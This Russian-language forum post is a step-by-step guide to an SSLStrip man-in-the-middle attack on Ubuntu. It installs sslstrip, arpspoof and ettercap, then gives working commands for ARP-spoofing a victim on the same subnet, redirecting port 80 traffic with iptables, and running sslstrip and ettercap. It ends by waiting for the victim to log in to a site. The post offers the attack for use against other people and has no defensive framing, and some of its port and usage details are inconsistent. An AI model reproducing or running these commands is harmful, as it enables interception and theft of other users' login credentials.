SSLStrip Шаг за Шагом на Убунту
В статье
http://www.xakep.ru/magazine/xa/125/026/1.asp в принципе всё и понятно написано, но всё же в Убунту есть свои нюансы.
Для дальнейшей работы нам необходимо:
1. SSLStrip
2. arpspoof
3. ettercap
4. ubuntu linux (пример показан на Karmic Koala 9.10)
5. сетевое подключение
6. жертва из той же подсети
Скачаем SSLStrip с сайта
http://www.thoughtcrime.org/software/sslstrip/
Вы скачаете архив sslstrip-0.6.tar.gz (версия может быть другая)
Мы же кул хацкеры)))) и будем разархивировать через терминал!
1, Открываем терминал.
2. Заходим в папку с архивом.
3. и пишем своими ручками "tar -zxvf sslstrip-0.6.tar.gz"'
4. заходим в появившуюся папку sslstrip-0.6(всё в терминале)
5. пишем sudo python setup.py build
6. и следующая команда sudo python setup.py install
Всё SSLStrip установлен.
Теперь я покажу как это приблизительно выглядело у меня
sagnat@sagnat-desktop:~$ ls
sagnat@sagnat-desktop:~$ cd Загрузки
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ tar -zxvf sslstrip-0.6.tar.gz
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ cd sslstrip-0.6
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ python setup.py build
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ sudo python setup.py install
Естественно я печать всё, что происходит у меня на компе не буду ну приблизительно установка выглядит так.
Что там у нас по списку?))))
Надо установить arpspoof.
Это всё проще простого)))
Пишем в терминале sudo apt-get install dsniff вводим пароль и всё))
Установка ettercap почти такая же: sudo apt-get install ettercap
Если вы не помните свой IP введите в терминале ifconfig.
Ещё вам будет нужен адрес шлюза это всё узнаётся вот ip route show | grep default | awk '{ print $3}' так.
И наконец самое интересное, откройте в своём терминале 3 вкладки
в одной запустите sudo arpspoof -i eth0 -t <Шлюз>
-i это сетевое соединение
-t это target - цель
выглядит эта форма вот так: sudo arpspoof -i eth0 -t 172.168.1.4 172.168.1.1
в другой введите sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
1000 - это прослушиваемый порт обычно ставиться на 8080
и запускаем sslstrip: sudo sslstrip
ну и в третьей вкладке запускаем ettercap: sudo ettercap -Tqz
Ждём когда жертва войдёт на какой-нибудь сайт.
_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.